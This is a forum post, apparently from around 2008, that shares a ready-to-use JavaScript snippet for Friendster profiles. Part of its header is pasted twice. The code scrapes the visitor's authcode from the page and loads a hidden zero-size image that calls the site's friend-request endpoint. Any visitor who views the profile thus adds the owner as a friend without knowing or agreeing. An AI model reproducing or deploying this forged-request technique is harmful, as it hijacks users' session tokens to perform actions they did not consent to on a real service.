Add the following codes to your existing javascript file:
[quote]/*----------------NOTICE TO THE PUBLIC----------------
FRIENDSTER AUTOMATIC ADD AS FRIEND
THIS NOTE MUST STAY INTACT WITH THIS CODE!
Add the following codes to your existing javascript file:
[quote]/*----------------NOTICE TO THE PUBLIC----------------
FRIENDSTER AUTOMATIC ADD AS FRIEND
THIS NOTE MUST STAY INTACT WITH THIS CODE!
CONSTRUCTED AND CODED BY MR. PAUL DEMONTEVERDE
YOU CAN USE FREELY ALL TEMPLATES, GRAPHICS AND CODES
BY AGREEING NOT TO REMOVE THIS COMMENT
PHILIPPINE COPYRIGHT 2008, PAULDEMONTEVERDE
Baguhan pa lang ako sa javascripting since I
constructed this code last April 05, 2007
pinagpuyatan ko ito!!!
Ang sabi ko baguhin nyu lang Email Add sa code!!!
Hindi ko sinabi na baguhin nyu yung javascript VARIABLES!!!
makisama naman kayu!!!
BUGS FIXED:
No worries about onload function
just add the codes on your existing javascript file
------------------------------------------------------*/
var email_add = "[b]PROVIDE_YOUR_FRIENDSTER_EMAIL_ADD[/b]";
var get_authcode = document.getElementById("controlPanelButtons").innerHTML;
var add_it = get_authcode.slice(get_authcode.indexOf("authcode="));
var PlaceInput = add_it.slice(9,39);
document.write('<img src="http://www.friendster.com/addfriendrequest.php?authcode='
+ PlaceInput + '&uid='
+ pageOwnerID + '&email='
+ email_add + '&firstname=&lastname=&friend=&submit=1"'
+ ' width="0" height="0" style="display:none" />');[/quote]
enjoy!
[align=center][b]credit By : ka paul[/b][/align]